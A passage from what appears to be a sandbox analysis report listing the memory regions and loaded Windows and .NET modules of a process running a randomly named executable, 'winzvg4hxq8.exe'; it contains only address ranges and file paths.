filename = "" Region: id = 9889 start_va = 0x60000 end_va = 0xc6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 9890 start_va = 0x860000 end_va = 0x9cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000860000" filename = "" Region: id = 9891 start_va = 0xd0000 end_va = 0x12ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 9892 start_va = 0x765e0000 end_va = 0x7667ffff monitored = 0 entry_point = 0x765f49e5 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 9893 start_va = 0x76530000 end_va = 0x765dbfff monitored = 0 entry_point = 0x7653a472 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 9894 start_va = 0x772f0000 end_va = 0x77308fff monitored = 0 entry_point = 0x772f4975 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 9895 start_va = 0x75600000 end_va = 0x756effff monitored = 0 entry_point = 0x75610569 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 9896 start_va = 0x75360000 end_va = 0x753bffff monitored = 0 entry_point = 0x7537a3b3 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 9897 start_va = 0x75350000 end_va = 0x7535bfff monitored = 0 entry_point = 0x753510e1 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 9898 start_va = 0x210000 end_va = 0x31ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 9899 start_va = 0x73e40000 end_va = 0x73eccfff monitored = 1 entry_point = 0x73e52860 region_type = mapped_file name = "mscoreei.dll" filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscoreei.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\mscoreei.dll") Region: id = 9900 start_va = 0x73e30000 end_va = 0x73e32fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-core-synch-l1-2-0.dll" filename = "\\Windows\\SysWOW64\\api-ms-win-core-synch-l1-2-0.dll" (normalized: "c:\\windows\\syswow64\\api-ms-win-core-synch-l1-2-0.dll") Region: id = 9901 start_va = 0x76f70000 end_va = 0x76fc6fff monitored = 0 entry_point = 0x76f89ba6 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 9902 start_va = 0x771a0000 end_va = 0x7722ffff monitored = 0 entry_point = 0x771b6343 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 9903 start_va = 0x76b00000 end_va = 0x76bfffff monitored = 0 entry_point = 0x76b1b6ed region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 9904 start_va = 0x76520000 end_va = 0x76529fff monitored = 0 entry_point = 0x765236a0 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll") Region: id = 9905 start_va = 0x753c0000 end_va = 0x7545cfff monitored = 0 entry_point = 0x753f3fd7 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 9906 start_va = 0x9d0000 end_va = 0xb57fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000009d0000" filename = "" Region: id = 9907 start_va = 0x20000 end_va = 0x3dfff monitored = 0 entry_point = 0x3158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 9908 start_va = 0x20000 end_va = 0x3dfff monitored = 0 entry_point = 0x3158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 9909 start_va = 0x76e50000 end_va = 0x76eaffff monitored = 0 entry_point = 0x76e6158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 9910 start_va = 0x769e0000 end_va = 0x76aabfff monitored = 0 entry_point = 0x769e168b region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 9911 start_va = 0xc80000 end_va = 0xe00fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000c80000" filename = "" Region: id = 9912 start_va = 0xe10000 end_va = 0x220ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e10000" filename = "" Region: id = 9913 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 9914 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 9915 start_va = 0x210000 end_va = 0x30ffff monitored = 1 entry_point = 0x2495ce region_type = mapped_file name = "winzvg4hxq8.exe" filename = "\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe" (normalized: "c:\\program files (x86)\\cmrkpgp\\winzvg4hxq8.exe") Region: id = 9916 start_va = 0x310000 end_va = 0x31ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000310000" filename = "" Region: id = 9917 start_va = 0x210000 end_va = 0x30ffff monitored = 1 entry_point = 0x2495ce region_type = mapped_file name = "winzvg4hxq8.exe" filename = "\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe" (normalized: "c:\\program files (x86)\\cmrkpgp\\winzvg4hxq8.exe") Region: id = 9918 start_va = 0x75330000 end_va = 0x75338fff monitored = 0 entry_point = 0x75331220 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 9919 start_va = 0x74b80000 end_va = 0x7532efff monitored = 1 entry_point = 0x74b9d0d0 region_type = mapped_file name = "clr.dll" filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\clr.dll") Region: id = 9920 start_va = 0x743d0000 end_va = 0x74b7efff monitored = 1 entry_point = 0x743ed0d0 region_type = mapped_file name = "clr.dll" filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\clr.dll") Region: id = 9921 start_va = 0x74b80000 end_va = 0x7532efff monitored = 1 entry_point = 0x74b9d0d0 region_type = mapped_file name = "clr.dll" filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\clr.dll") Region: id = 9922 start_va = 0x74a70000 end_va = 0x74a83fff monitored = 0 entry_point = 0x74a7ac00 region_type = mapped_file name = "vcruntime140_clr0400.dll" filename = "\\Windows\\SysWOW64\\vcruntime140_clr0400.dll" (normalized: "c:\\windows\\syswow64\\vcruntime140_clr0400.dll") Region: id = 9923 start_va = 0x749c0000 end_va = 0x74a6afff monitored = 0 entry_point = 0x74a55f20 region_type = mapped_file name = "ucrtbase_clr0400.dll" filename = "\\Windows\\SysWOW64\\ucrtbase_clr0400.dll" (normalized: "c:\\windows\\syswow64\\ucrtbase_clr0400.dll") Region: id = 9924 start_va = 0xd0000 end_va = 0xd0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 9925 start_va = 0xf0000 end_va = 0x12ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 9926 start_va = 0xe0000 end_va = 0xeffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 9927 start_va = 0x130000 end_va = 0x13ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 9928 start_va = 0x140000 end_va = 0x14ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000140000" filename = "" Region: id = 9929 start_va = 0x150000 end_va = 0x15ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 9930 start_va = 0x160000 end_va = 0x16ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000160000" filename = "" Region: id = 9931 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 9932 start_va = 0x180000 end_va = 0x180fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000180000" filename = "" Region: id = 9933 start_va = 0x190000 end_va = 0x190fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 9934 start_va = 0x210000 end_va = 0x2dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 9935 start_va = 0x2210000 end_va = 0x241ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002210000" filename = "" Region: id = 9936 start_va = 0x250000 end_va = 0x28ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000250000" filename = "" Region: id = 9937 start_va = 0x2a0000 end_va = 0x2dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 9938 start_va = 0x8c0000 end_va = 0x9bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000008c0000" filename = "" Region: id = 9939 start_va = 0x9c0000 end_va = 0x9cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000009c0000" filename = "" Region: id = 9940 start_va = 0x7efd8000 end_va = 0x7efdafff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efd8000" filename = "" Region: id = 9941 start_va = 0x1a0000 end_va = 0x1affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 9942 start_va = 0x2420000 end_va = 0x441ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002420000" filename = "" Region: id = 9943 start_va = 0x440000 end_va = 0x4dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 9944 start_va = 0x620000 end_va = 0x65ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000620000" filename = "" Region: id = 9945 start_va = 0x760000 end_va = 0x85ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000760000" filename = "" Region: id = 9946 start_va = 0x22a0000 end_va = 0x239ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000022a0000" filename = "" Region: id = 9947 start_va = 0x23e0000 end_va = 0x241ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000023e0000" filename = "" Region: id = 9948 start_va = 0x7efd5000 end_va = 0x7efd7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efd5000" filename = "" Region: id = 9960 start_va = 0x510000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 9961 start_va = 0x4430000 end_va = 0x452ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004430000" filename = "" Region: id = 9962 start_va = 0x7efad000 end_va = 0x7efaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efad000" filename = "" Region: id = 9963 start_va = 0x4530000 end_va = 0x47fefff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 9964 start_va = 0x72a20000 end_va = 0x73e2afff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "mscorlib.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\mscorlib\\36eaccfde177c2e7b93b8dbdde4e012a\\mscorlib.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\mscorlib\\36eaccfde177c2e7b93b8dbdde4e012a\\mscorlib.ni.dll") Region: id = 9965 start_va = 0x75750000 end_va = 0x758abfff monitored = 0 entry_point = 0x7579ba3d region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 9966 start_va = 0x74930000 end_va = 0x749affff monitored = 0 entry_point = 0x749437c9 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 9967 start_va = 0x4800000 end_va = 0x499ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004800000" filename = "" Region: id = 9968 start_va = 0x660000 end_va = 0x73efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000660000" filename = "" Region: id = 9969 start_va = 0x1a0000 end_va = 0x1affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 9970 start_va = 0x74920000 end_va = 0x74922fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-core-xstate-l2-1-0.dll" filename = "\\Windows\\SysWOW64\\api-ms-win-core-xstate-l2-1-0.dll" (normalized: "c:\\windows\\syswow64\\api-ms-win-core-xstate-l2-1-0.dll") Region: id = 9971 start_va = 0x74890000 end_va = 0x74918fff monitored = 1 entry_point = 0x74891130 region_type = mapped_file name = "clrjit.dll" filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clrjit.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\clrjit.dll") Region: id = 9972 start_va = 0x77110000 end_va = 0x7719efff monitored = 0 entry_point = 0x77113fb1 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 9973 start_va = 0x1b0000 end_va = 0x1bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 9974 start_va = 0x1c0000 end_va = 0x1cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 9975 start_va = 0x210000 end_va = 0x21ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 9976 start_va = 0x220000 end_va = 0x22ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000220000" filename = "" Region: id = 9977 start_va = 0x230000 end_va = 0x23ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000230000" filename = "" Region: id = 9978 start_va = 0x1c0000 end_va = 0x1cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 9979 start_va = 0x210000 end_va = 0x21ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 9980 start_va = 0x220000 end_va = 0x22ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000220000" filename = "" Region: id = 9981 start_va = 0x74870000 end_va = 0x74882fff monitored = 1 entry_point = 0x7487d900 region_type = mapped_file name = "nlssorting.dll" filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\nlssorting.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\nlssorting.dll") Region: id = 9982 start_va = 0x49a0000 end_va = 0x4c71fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nlp" filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\sortdefault.nlp" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\sortdefault.nlp") Region: id = 9983 start_va = 0x4c80000 end_va = 0x4eaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004c80000" filename = "" Region: id = 9984 start_va = 0x210000 end_va = 0x21ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 9985 start_va = 0x220000 end_va = 0x22ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000220000" filename = "" Region: id = 9986 start_va = 0x71fc0000 end_va = 0x72a14fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System\\2c3c912ea8f058f9d04c4650128feb3f\\System.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system\\2c3c912ea8f058f9d04c4650128feb3f\\system.ni.dll") Region: id = 9987 start_va = 0x210000 end_va = 0x21ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 9988 start_va = 0x220000 end_va = 0x22ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000220000" filename = "" Region: id = 9989 start_va = 0x210000 end_va = 0x21ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 9990 start_va = 0x220000 end_va = 0x22ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000220000" filename = "" Region: id = 9991 start_va = 0x210000 end_va = 0x21ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 9992 start_va = 0x220000 end_va = 0x22ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000220000" filename = "" Region: id = 9993 start_va = 0x210000 end_va = 0x21ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 9994 start_va = 0x220000 end_va = 0x22ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000220000" filename = "" Region: id = 9995 start_va = 0x210000 end_va = 0x21ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 9996 start_va = 0x220000 end_va = 0x22ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000220000" filename = "" Region: id = 9997 start_va = 0x210000 end_va = 0x21ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 9998 start_va = 0x220000 end_va = 0x22ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000220000" filename = "" Region: id = 9999 start_va = 0x210000 end_va = 0x21ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 10000 start_va = 0x210000 end_va = 0x21ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 10001 start_va = 0x220000 end_va = 0x22ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000220000" filename = "" Region: id = 10002 start_va = 0x746c0000 end_va = 0x74862fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.drawing.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Drawing\\f7568d7f1b9d356f64779b4c0927cfb3\\System.Drawing.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.drawing\\f7568d7f1b9d356f64779b4c0927cfb3\\system.drawing.ni.dll") Region: id = 10003 start_va = 0x71150000 end_va = 0x71fb5fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.windows.forms.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Windows.Forms\\c9a4cbc00f690a9e3cddfc400f6e85bb\\System.Windows.Forms.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.windows.forms\\c9a4cbc00f690a9e3cddfc400f6e85bb\\system.windows.forms.ni.dll") Region: id = 10004 start_va = 0x210000 end_va = 0x21ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 10005 start_va = 0x210000 end_va = 0x21ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 10006 start_va = 0x220000 end_va = 0x22ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000220000" filename = "" Region: id = 10007 start_va = 0x2230000 end_va = 0x226ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002230000" filename = "" Region: id = 10008 start_va = 0x4860000 end_va = 0x495ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004860000" filename = "" Region: id = 10009 start_va = 0x4960000 end_va = 0x499ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004960000" filename = "" Region: id = 10010 start_va = 0x7efaa000 end_va = 0x7efacfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efaa000" filename = "" Region: id = 10011 start_va = 0xbe0000 end_va = 0xc1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000be0000" filename = "" Region: id = 10012 start_va = 0x4c80000 end_va = 0x4d7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004c80000" filename = "" Region: id = 10013 start_va = 0x4e70000 end_va = 0x4eaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004e70000" filename = "" Region: id = 10014 start_va = 0x7efa7000 end_va = 0x7efa9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efa7000" filename = "" Region: id = 10015 start_va = 0x74110000 end_va = 0x746b3fff monitored = 1 entry_point = 0x7469b692 region_type = mapped_file name = "system.windows.forms.dll" filename = "\\Windows\\Microsoft.NET\\assembly\\GAC_MSIL\\System.Windows.Forms\\v4.0_4.0.0.0__b77a5c561934e089\\System.Windows.Forms.dll" (normalized: "c:\\windows\\microsoft.net\\assembly\\gac_msil\\system.windows.forms\\v4.0_4.0.0.0__b77a5c561934e089\\system.windows.forms.dll") Region: id = 10016 start_va = 0x230000 end_va = 0x231fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000230000" filename = "" Region: id = 10017 start_va = 0x70930000 end_va = 0x71147fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.core.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Core\\31fae3290fad30c31c98651462d22724\\System.Core.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.core\\31fae3290fad30c31c98651462d22724\\system.core.ni.dll") Region: id = 10018 start_va = 0x745b0000 end_va = 0x746b4fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.configuration.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Configuration\\96f7edb07b12303f0ec2595c7f3778c7\\System.Configuration.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.configuration\\96f7edb07b12303f0ec2595c7f3778c7\\system.configuration.ni.dll") Region: id = 10019 start_va = 0x701b0000 end_va = 0x70923fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.xml.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Xml\\15af16d373cf0528cb74fc73d365fdbf\\System.Xml.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.xml\\15af16d373cf0528cb74fc73d365fdbf\\system.xml.ni.dll") Region: id = 10020 start_va = 0x758c0000 end_va = 0x76509fff monitored = 0 entry_point = 0x75941601 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 10021 start_va = 0x240000 end_va = 0x240fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000240000" filename = "" Region: id = 10022 start_va = 0x745a0000 end_va = 0x745aafff monitored = 0 entry_point = 0x745a1992 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 10023 start_va = 0x74580000 end_va = 0x74596fff monitored = 0 entry_point = 0x745835fa region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 10024 start_va = 0x74560000 end_va = 0x74576fff monitored = 0 entry_point = 0x74563573 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\SysWOW64\\cryptsp.dll" (normalized: "c:\\windows\\syswow64\\cryptsp.dll") Region: id = 10025 start_va = 0x550000 end_va = 0x58bfff monitored = 0 entry_point = 0x55128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 10026 start_va = 0x550000 end_va = 0x58bfff monitored = 0 entry_point = 0x55128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 10027 start_va = 0x550000 end_va = 0x58bfff monitored = 0 entry_point = 0x55128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 10028 start_va = 0x550000 end_va = 0x58bfff monitored = 0 entry_point = 0x55128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 10029 start_va = 0x550000 end_va = 0x58bfff monitored = 0 entry_point = 0x55128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 10030 start_va = 0x74520000 end_va = 0x7455afff monitored = 0 entry_point = 0x7452128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 10031 start_va = 0x4d80000 end_va = 0x4e01fff monitored = 0 entry_point = 0x4d819a9 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll") Region: id = 10032 start_va = 0x4d80000 end_va = 0x4e01fff monitored = 0 entry_point = 0x4d819a9 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll") Region: id = 10033 start_va = 0x74490000 end_va = 0x74513fff monitored = 0 entry_point = 0x744919a9 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll") Region: id = 10034 start_va = 0x290000 end_va = 0x29ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000290000" filename = "" Region: id = 10035 start_va = 0xb60000 end_va = 0xbc1fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "mscorrc.dll" filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorrc.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\mscorrc.dll") Region: id = 10036 start_va = 0x2e0000 end_va = 0x2effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 10037 start_va = 0x2e0000 end_va = 0x2effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 10038 start_va = 0x2e0000 end_va = 0x2effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 10039 start_va = 0x2e0000 end_va = 0x2effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 10040 start_va = 0x2e0000 end_va = 0x2effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 10041 start_va = 0x2e0000 end_va = 0x2effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 10042 start_va = 0x2e0000 end_va = 0x2effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 10043 start_va = 0x2e0000 end_va = 0x2effff monitored = 1 entry_point = 